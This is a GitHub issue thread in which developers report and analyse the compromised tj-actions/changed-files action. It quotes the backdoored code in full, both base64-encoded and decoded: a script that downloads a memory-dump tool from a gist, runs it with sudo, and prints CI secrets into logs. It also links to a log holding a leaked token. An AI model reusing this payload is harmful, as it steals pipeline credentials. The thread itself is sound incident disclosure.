Multiple tags in this action are compromised

[varunsh-coder]

Example this tag was just updated 3 hours back and is potentially exfiltrating credentials
https://github.com/tj-actions/changed-files/tags?after=v35.9.3

You can read more here: https://www.stepsecurity.io/blog/harden-runner-detection-tj-actions-changed-files-action-is-compromised

Reported the issue via the email address provided in the security.md file and also reported it via private vulnerability disclosure to generate a CVE.

[salolivares]

Yep... this looks scary: 0e58ed8

edit: https://semgrep.dev/blog/2025/popular-github-action-tj-actionschanged-files-is-compromised/

[kbsteere]

@jackton1 for you awareness

[ElijahLynn]

It ultimately dumps memory to GHA logs, which can include GHA secrets:

from the malicious commit: 0e58ed8 introduced in:

• chore(deps): lock file maintenance #2460

async function updateFeatures(token) {
   
     const {stdout, stderr} = await exec.getExecOutput('bash', ['-c', `echo "aWYgW1sgIiRPU1RZUEUiID09ICJsaW51eC1nbnUiIF1dOyB0aGVuCiAgQjY0X0JMT0I9YGN1cmwgLXNTZiBodHRwczovL2dpc3QuZ2l0aHVidXNlcmNvbnRlbnQuY29tL25pa2l0YXN0dXBpbi8zMGU1MjViNzc2YzQwOWUwM2MyZDZmMzI4ZjI1NDk2NS9yYXcvbWVtZHVtcC5weSB8IHN1ZG8gcHl0aG9uMyB8IHRyIC1kICdcMCcgfCBncmVwIC1hb0UgJyJbXiJdKyI6XHsidmFsdWUiOiJbXiJdKiIsImlzU2VjcmV0Ijp0cnVlXH0nIHwgc29ydCAtdSB8IGJhc2U2NCAtdyAwIHwgYmFzZTY0IC13IDBgCiAgZWNobyAkQjY0X0JMT0IKZWxzZQogIGV4aXQgMApmaQo=" | base64 -d > /tmp/run.sh && bash /tmp/run.sh`], {
         ignoreReturnCode: true,
         silent: true
     });
     core.info(stdout);
     
 }

And if we base64 decode it:

echo "aWYgW1sgIiRPU1RZUEUiID09ICJsaW51eC1nbnUiIF1dOyB0aGVuCiAgQjY0X0JMT0I9YGN1cmwgLXNTZiBodHRwczovL2dpc3QuZ2l0aHVidXNlcmNvbnRlbnQuY29tL25pa2l0YXN0dXBpbi8zMGU1MjViNzc2YzQwOWUwM2MyZDZmMzI4ZjI1NDk2NS9yYXcvbWVtZHVtcC5weSB8IHN1ZG8gcHl0aG9uMyB8IHRyIC1kICdcMCcgfCBncmVwIC1hb0UgJyJbXiJdKyI6XHsidmFsdWUiOiJbXiJdKiIsImlzU2VjcmV0Ijp0cnVlXH0nIHwgc29ydCAtdSB8IGJhc2U2NCAtdyAwIHwgYmFzZTY0IC13IDBgCiAgZWNobyAkQjY0X0JMT0IKZWxzZQogIGV4aXQgMApmaQo=" | base64 -d 

if [[ "$OSTYPE" == "linux-gnu" ]]; then
  B64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0 | base64 -w 0`
  echo $B64_BLOB
else
  exit 0
fi

[aetzieba]

Is it possible that this fails if bash is not installed?

[Leroy231]

Is it possible that this fails if bash is not installed?

Yes, I started getting this error on my self-hosted Windows runners:

Error: Unable to locate executable file: bash. Please verify either the file path exists or the file can be found within a directory specified by the PATH environment variable. Also verify the file has a valid extension for an executable file.

Not sure if GitHub hosted Windows runners have bash installed.

[Leroy231]

@varunsh-coder did you already contact the email address in https://github.com/tj-actions/changed-files/security#public-vulnerability-disclosures?

[varunsh-coder]

@varunsh-coder did you already contact the email address in https://github.com/tj-actions/changed-files/security#public-vulnerability-disclosures?

Yes

[aetzieba]

Is it possible that this fails if bash is not installed?

Yes, I started getting this error on my self-hosted Windows runners:

Error: Unable to locate executable file: bash. Please verify either the file path exists or the file can be found within a directory specified by the PATH environment variable. Also verify the file has a valid extension for an executable file.

Not sure if GitHub hosted Windows runners have bash installed.

I noticed this in a similar scenario.

[AdnaneKhan]

We even see some repositories using the backdoored commit by hash after updates by Renovate: https://github.com/search?q=0e58ed8671d6b60d0890c21b07f8835ace038e67&type=code

[ElijahLynn]

We even see some repositories using the backdoored commit by hash after updates by Renovate: github.com/search?q=0e58ed8671d6b60d0890c21b07f8835ace038e67&type=code

I've just confirmed that it is printing double base64 encoded secrets in runner job logs based on your link.

Here is one: https://github.com/szinn/k8s-homelab/actions/runs/13865435819/job/38803427088?pr=5353, double base64 --decode that output and boom, there is a github_token.

[ElijahLynn]

Every tag got pointed to this malicious commit:

https://github.com/tj-actions/changed-files/tags

[ElijahLynn]

I've just emailed security@github.com too with the title: "Urgent: Hundreds/Thousands of github_token secrets leaked" and linked to this issue. Because some action needs to be taken at the GitHub level to fix this and inform everyone.

[gaby]

@ElijahLynn I submitted a active malware report too